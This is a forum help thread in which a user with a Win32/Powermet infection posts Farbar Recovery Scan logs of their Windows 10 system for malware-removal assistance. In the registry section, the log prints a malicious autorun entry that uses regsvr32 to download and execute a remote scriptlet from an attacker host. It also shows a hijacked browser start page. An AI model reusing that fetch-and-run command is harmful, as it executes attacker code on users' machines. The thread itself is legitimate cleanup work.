
I have a virus called Win32/Powermet.B!attk!!


  • This topic is locked
13 replies to this topic

#1 AbhaySolanki

  • Members
  • 13 posts

Posted 20 September 2017 - 12:47 AM

It infected my Steam and all its folders came onto the Desktop. I tried uninstalling it, but all the other important stuff on my desktop got deleted and all that was left was the Steam folders.

#2 AbhaySolanki

  • Topic Starter
  • Members
  • 13 posts

Posted 20 September 2017 - 12:50 AM

This is the first log.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-09-2017
Ran by Abhay (administrator) on DESKTOP-PL742CC (20-09-2017 11:09:19)
Running from C:\Users\Admin\Downloads
Loaded Profiles: Abhay (Available Profiles: Abhay)
Platform: Windows 10 Enterprise (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Windows ® Win 7 DDK provider) C:\Windows\System32\AdminService.exe
(Intel Corporation) C:\Windows\System32\Intel\DPTF\esif_uf.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\NetworkUXBroker.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.6568.46361.0_x64__8wekyb3d8bbwe\HxMail.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.6568.46361.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [QuickSet] => C:\Program Files\Dell\QuickSet\QuickSet.exe [3926016 2016-05-26] (Dell Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9080848 2017-08-05] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => c:\Program Files\Waves\MaxxAudio\WavesSvc64.exe [940976 2016-11-19] (Waves Audio Ltd.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-22] (Oracle Corporation)
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [1305408 2011-01-20] (DT Soft Ltd)
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{47ae2bd7-5f3f-44d5-89a1-6cd567f1a52b}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=plk_coinisre_17_30_ssg01&cd=2XzuyEtN2Y1L1Qzu0A0AyC0B0A0DyDtByB0DyE0FtA0Fzy0FtN0D0Tzu0StBtDtAtBtN1L2XzutAtFtByBtFyEtFyDtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyBtCtBtBtD0CyEyEtGyDtD0A0FtGtA0F0A0AtGtDyDyB0EtGtCtCyCzyyBtA0B0C0B0DtD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyByByBtB0DyC0D0CtGzztD0FyDtGyE0FtBtAtGzzyCyB0DtGtCyC0AzyyD0FtCyBtBzzyE0F2QtN0A0LzuyE&cr=410628304&ir=
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_144\bin\ssv.dll [2017-08-05] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-05] (Oracle Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: 383lmmts.default
FF ProfilePath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\383lmmts.default [2017-09-18]
FF Plugin: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-05] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-05] (Oracle Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-05] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-05] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-08-18] (Adobe Systems Inc.)
 
Chrome:
=======
CHR Profile: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default [2017-09-19]
CHR Extension: (Google Docs) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-05]
CHR Extension: (Google Drive) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-05]
CHR Extension: (YouTube) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-05]
CHR Extension: (Google Docs Offline) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-25]
CHR Extension: (Gmail) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-05]
CHR Extension: (Chrome Media Router) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-13]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1530888 2017-07-29] ()
S3 cplspcon; C:\Windows\system32\IntelCpHDCPSvc.exe [480216 2017-08-05] (Intel Corporation)
R2 esifsvc; C:\Windows\system32\Intel\DPTF\esif_uf.exe [2223864 2017-08-05] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [341976 2017-08-05] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [987432 2016-06-15] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [215328 2016-07-19] (Intel Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2017-09-01] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [103736 2017-09-01] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [329736 2017-08-05] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [269920 2017-08-05] (Synaptics Incorporated)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [44544 2015-03-03] (Synaptics Incorporated) [File not signed]
R2 WavesSysSvc; c:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe [410032 2016-11-19] (Waves Audio Ltd.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2016-10-25] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2017-06-03] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2017-08-09] (Samsung Electronics Co., Ltd.)
R2 DpmLiteDrv; C:\Program Files\Dell\QuickSet\DpmLiteDrv64.sys [15080 2014-10-15] (Wistron Corp.)
R3 dptf_cpu; C:\Windows\System32\drivers\dptf_cpu.sys [75320 2017-08-05] (Intel Corporation)
R1 dtsoftbus01; C:\Windows\System32\drivers\dtsoftbus01.sys [254528 2017-08-05] (DT Soft Ltd)
R3 esif_lf; C:\Windows\System32\drivers\esif_lf.sys [358968 2017-08-05] (Intel Corporation)
R3 HidEventFilter; C:\Windows\System32\drivers\HidEventFilter.sys [63496 2017-08-05] (Intel Corporation)
R3 iaLPSS2_GPIO2; C:\Windows\System32\drivers\iaLPSS2_GPIO2.sys [98608 2017-08-05] (Intel Corporation)
R1 MpKsl8296ef7f; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{FAB4EBD9-F4D3-4E08-844A-6222FAE6FE2F}\MpKsl8296ef7f.sys [44928 2017-09-19] (Microsoft Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [955392 2017-08-05] (Realtek )
R3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [436224 2017-08-05] (Realsil Semiconductor Corporation)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [165504 2017-08-09] (Samsung Electronics Co., Ltd.)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [74848 2017-08-05] (Synaptics Incorporated)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 

==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-20 11:09 - 2017-09-20 11:10 - 000012243 _____ C:\Users\Admin\Downloads\FRST.txt
2017-09-20 11:09 - 2017-09-20 11:09 - 000000000 ____D C:\FRST
2017-09-20 11:08 - 2017-09-20 11:08 - 002399744 _____ (Farbar) C:\Users\Admin\Downloads\FRST64.exe
2017-09-20 10:43 - 2017-09-20 10:43 - 000016148 _____ C:\Windows\system32\DESKTOP-PL742CC_Abhay_HistoryPrediction.bin
2017-09-18 19:24 - 2017-09-19 20:40 - 000000000 ____D C:\Users\Admin\Desktop\userdata
2017-09-18 19:22 - 2017-09-19 20:40 - 000000000 ____D C:\Users\Admin\Desktop\bin
2017-09-18 19:22 - 2017-09-18 19:22 - 000000000 ____D C:\Users\Admin\Desktop\tenfoot
2017-09-18 12:38 - 2017-09-18 12:38 - 000001933 _____ C:\Users\Admin\Downloads\Maze.java.zip
2017-09-13 14:29 - 2017-09-13 14:29 - 000054024 _____ C:\Users\Admin\Downloads\cur197.ani
2017-09-13 11:51 - 2017-09-15 12:23 - 000000079 _____ C:\Users\Admin\Desktop\email teacher.txt
2017-09-12 21:54 - 2017-09-12 21:54 - 000000000 ____D C:\Users\Admin\Documents\My Games
2017-09-12 21:54 - 2017-09-12 21:54 - 000000000 ____D C:\Users\Admin\AppData\Local\Skyrim
2017-09-12 21:53 - 2017-09-12 21:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razor 1911
2017-09-09 12:48 - 2017-09-09 12:48 - 000000000 ___HD C:\OneDriveTemp
2017-09-08 21:04 - 2017-09-08 21:05 - 000134771 ____T C:\Windows\mndFC2C.diagerr.mdmp
2017-09-08 13:59 - 2017-09-08 13:59 - 000002012 _____ C:\Windows\SysWOW64\BrowserSettings.InstallState
2017-09-08 13:59 - 2017-09-08 13:59 - 000000000 ____D C:\Program Files (x86)\(n)Code Solutions
2017-09-08 13:57 - 2017-09-08 13:57 - 000489126 _____ C:\Users\Admin\Downloads\(n)Procure Tool.zip
2017-09-08 13:48 - 2017-09-20 10:18 - 000004166 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{2AC21A95-CAC6-4662-9E57-304212EA18A3}
2017-09-07 16:10 - 2017-09-09 13:10 - 000000000 ____D C:\Users\Admin\AppData\LocalLow\Daybreak Game Company
2017-09-07 16:10 - 2017-09-07 16:10 - 000000000 ____D C:\Users\Admin\AppData\Local\SCE
2017-09-07 16:10 - 2017-09-07 16:10 - 000000000 ____D C:\Users\Admin\AppData\Local\Daybreak Game Company
2017-09-01 23:54 - 2017-09-01 23:55 - 001518536 _____ (Badomehit ) C:\Users\Admin\Downloads\adobe_flash_setup_4186731414.exe
2017-09-01 20:30 - 2017-09-08 23:56 - 000000000 ____D C:\Users\Admin\Documents\Dungeons and Dragons Online
2017-09-01 20:30 - 2017-09-02 00:06 - 000000000 ____D C:\Users\Admin\AppData\Local\Turbine
2017-09-01 20:30 - 2017-09-01 20:30 - 000895276 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2017-09-01 20:29 - 2017-09-01 20:29 - 000000000 ____D C:\Windows\SysWOW64\URTTEMP
2017-08-31 11:05 - 2017-08-31 11:05 - 000000000 ____D C:\Users\Admin\AppData\Local\CallofDuty4MW
2017-08-31 11:01 - 2017-08-31 11:04 - 003282353 _____ C:\Users\Admin\Downloads\cod4x_client.zip
2017-08-31 10:47 - 2017-08-31 10:49 - 004515759 _____ C:\Users\Admin\Downloads\cod4mw_pb.zip
2017-08-30 13:02 - 2017-08-30 13:03 - 005782856 _____ C:\Users\Admin\Downloads\GTSetup-1.5.3.exe
2017-08-30 12:54 - 2017-08-30 12:54 - 004234744 _____ C:\Users\Admin\Downloads\COD4_pbfiles2014.rar
2017-08-29 12:23 - 2017-08-29 12:24 - 004504689 _____ C:\Users\Admin\Downloads\File_6409_-_gaacod4_win32.zip
2017-08-26 22:03 - 2017-08-27 11:11 - 000000000 ____D C:\Users\Admin\AppData\Local\Argo
2017-08-26 22:03 - 2017-08-26 22:03 - 000000000 ____D C:\ProgramData\Bohemia Interactive
2017-08-26 11:07 - 2017-08-26 11:08 - 003139984 _____ C:\Users\Admin\Downloads\servercache.dat
2017-08-26 11:04 - 2017-09-01 08:41 - 000103736 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2017-08-26 11:04 - 2017-09-01 08:40 - 000066872 _____ C:\Windows\SysWOW64\PnkBstrA.exe
2017-08-25 21:54 - 2017-09-18 23:38 - 000000000 ____D C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-08-22 22:56 - 2017-08-22 22:56 - 000003160 _____ C:\Windows\System32\Tasks\StartCN
2017-08-22 22:56 - 2017-08-22 22:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-08-22 22:56 - 2017-08-22 22:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-08-22 22:54 - 2017-08-22 22:54 - 000000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-08-22 22:45 - 2017-08-22 22:45 - 000000000 ____D C:\Users\Admin\AppData\Roaming\ATI
2017-08-22 22:45 - 2017-08-22 22:45 - 000000000 ____D C:\Users\Admin\AppData\Local\ATI
2017-08-22 22:45 - 2017-08-22 22:45 - 000000000 ____D C:\ProgramData\ATI
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-20 10:43 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\AppReadiness
2017-09-19 20:11 - 2017-08-05 01:24 - 000003808 _____ C:\Windows\System32\Tasks\AutoKMS
2017-09-19 12:51 - 2015-07-10 16:34 - 000000000 ___HD C:\Program Files\WindowsApps
2017-09-18 19:37 - 2017-08-05 01:09 - 000887678 _____ C:\Windows\system32\PerfStringBackup.INI
2017-09-18 19:37 - 2015-07-10 16:32 - 000000000 ____D C:\Windows\INF
2017-09-18 19:32 - 2015-07-10 17:51 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-09-18 19:31 - 2015-07-10 14:35 - 000262144 ___SH C:\Windows\system32\config\BBI
2017-09-18 19:30 - 2017-08-05 01:04 - 000000000 ____D C:\Users\Admin
2017-09-18 12:55 - 2017-08-05 06:40 - 000000000 ____D C:\Users\Admin\AppData\LocalLow\Mozilla
2017-09-17 13:56 - 2017-08-05 01:27 - 000000000 ____D C:\Users\Admin\AppData\Roaming\vlc
2017-09-16 20:34 - 2017-08-05 01:56 - 000000000 ____D C:\Windows\Panther
2017-09-15 13:27 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\LiveKernelReports
2017-09-13 14:39 - 2017-08-05 08:26 - 000000000 ____D C:\Windows\system32\MRT
2017-09-13 14:07 - 2017-08-05 08:26 - 138202976 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-09-13 14:01 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\Cursors
2017-09-12 12:10 - 2017-07-11 13:09 - 000000000 ___HD C:\$WINDOWS.~BT
2017-09-09 16:02 - 2017-08-05 01:07 - 000000000 ___RD C:\Users\Admin\OneDrive
2017-09-09 12:47 - 2017-08-05 06:25 - 000003376 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1238717651-3256879073-989753507-1001
2017-09-09 12:47 - 2017-08-05 01:07 - 000002363 _____ C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-09-08 21:26 - 2017-08-05 11:06 - 000000000 ____D C:\Users\Admin\AppData\Roaming\obs-studio
2017-09-08 20:30 - 2017-08-05 23:47 - 000000000 ____D C:\Users\Admin\AppData\Local\Steam
2017-09-05 14:06 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\rescache
2017-09-02 17:03 - 2017-08-05 01:27 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-09-02 17:03 - 2017-08-05 01:27 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-09-01 20:30 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\Registration
2017-08-28 15:12 - 2017-08-05 01:06 - 000000420 _____ C:\Users\Admin\Desktop\This PC - Shortcut.lnk
2017-08-26 08:24 - 2017-08-05 01:27 - 000002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-22 23:00 - 2017-08-05 01:09 - 000000000 ____D C:\Users\Admin\AppData\Local\AMD
2017-08-22 22:56 - 2017-08-05 01:07 - 000000000 ____D C:\Program Files\AMD
2017-08-22 22:55 - 2017-08-05 01:09 - 000000000 ____D C:\Program Files (x86)\AMD
2017-08-22 22:53 - 2017-08-05 01:08 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-08-22 22:46 - 2017-08-05 01:07 - 000000000 ____D C:\ProgramData\Package Cache
 
==================== Files in the root of some directories =======
 
2017-08-14 11:38 - 2017-08-14 11:38 - 000000000 _____ () C:\Users\Admin\AppData\Local\{F74DEB18-5EAC-4E14-BC03-BB592F7DB538}
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-09-13 20:43
 
==================== End of FRST.txt ============================

 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-09-2017
Ran by Abhay (20-09-2017 11:10:46)
Running from C:\Users\Admin\Downloads
Windows 10 Enterprise (X64) (2017-08-04 19:33:13)
Boot Mode: Normal
==========================================================
 

==================== Accounts: =============================
 
Abhay (S-1-5-21-1238717651-3256879073-989753507-1001 - Administrator - Enabled) => C:\Users\Admin
Administrator (S-1-5-21-1238717651-3256879073-989753507-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1238717651-3256879073-989753507-1002 - Limited - Enabled)
DefaultAccount (S-1-5-21-1238717651-3256879073-989753507-503 - Limited - Disabled)
Guest (S-1-5-21-1238717651-3256879073-989753507-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
(n)Code Solutions - PKI Component (Ver 3.0.0) (HKLM-x32\...\{2D810C13-E97C-46EF-8707-2D9A1FDB8E65}) (Version: 3.0.0 - (n)Code Solutions)
Adobe Reader XI (11.0.22) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.22 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
BitTorrent (HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\BitTorrent) (Version: 7.10.0.43917 - BitTorrent Inc.)
Black Squad (HKLM\...\Steam App 550650) (Version:  - NS STUDIO)
Catalyst Control Center Next Localization BR (HKLM\...\{85EC2DC7-901A-C7A8-69CC-D14B5311C057}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{155ABE97-ABF9-EE58-3270-334EF950F3A9}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{44167DA6-B26A-A06B-213E-A481135FCBF0}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{ED204021-2012-F4F3-E495-F4AFD74D66FF}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{1D12B9AD-21F1-791A-6A85-47F27406282C}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{0101153A-CA07-4E2C-EF5E-D411604CF036}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{3BBAB5EA-62DA-2431-3A1F-3F89BBAE739D}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{975476BF-784B-0C34-09B3-AE6DC25C2B3C}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{2F028509-06B7-9869-5FD6-1F367A0B5827}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{8A5107B8-9CC4-141F-141D-B1952B84A62A}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{BFDF75E6-EBBE-FD30-7DED-A80A072A0452}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{665B0E99-0560-6850-876C-259CC785D49A}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{8191CEE4-C7AB-5A02-4587-9D12B6B443F2}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{E3D88B8D-BB11-D376-C3C6-EF7D0F8DD725}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{8831C53E-B6FA-3DE6-FB39-66BD5019F083}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{CB203E05-4AAA-9076-7D8B-5D7CAD7F0D39}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{4166E94C-7758-3D0E-1518-05BF181FBA21}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{E2D25167-8913-E00E-6755-270D9010DF62}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{4BE67694-29C6-6A69-85E4-D06EFCA12846}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{7B1A228A-7D97-3209-B386-AA878D3555C5}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
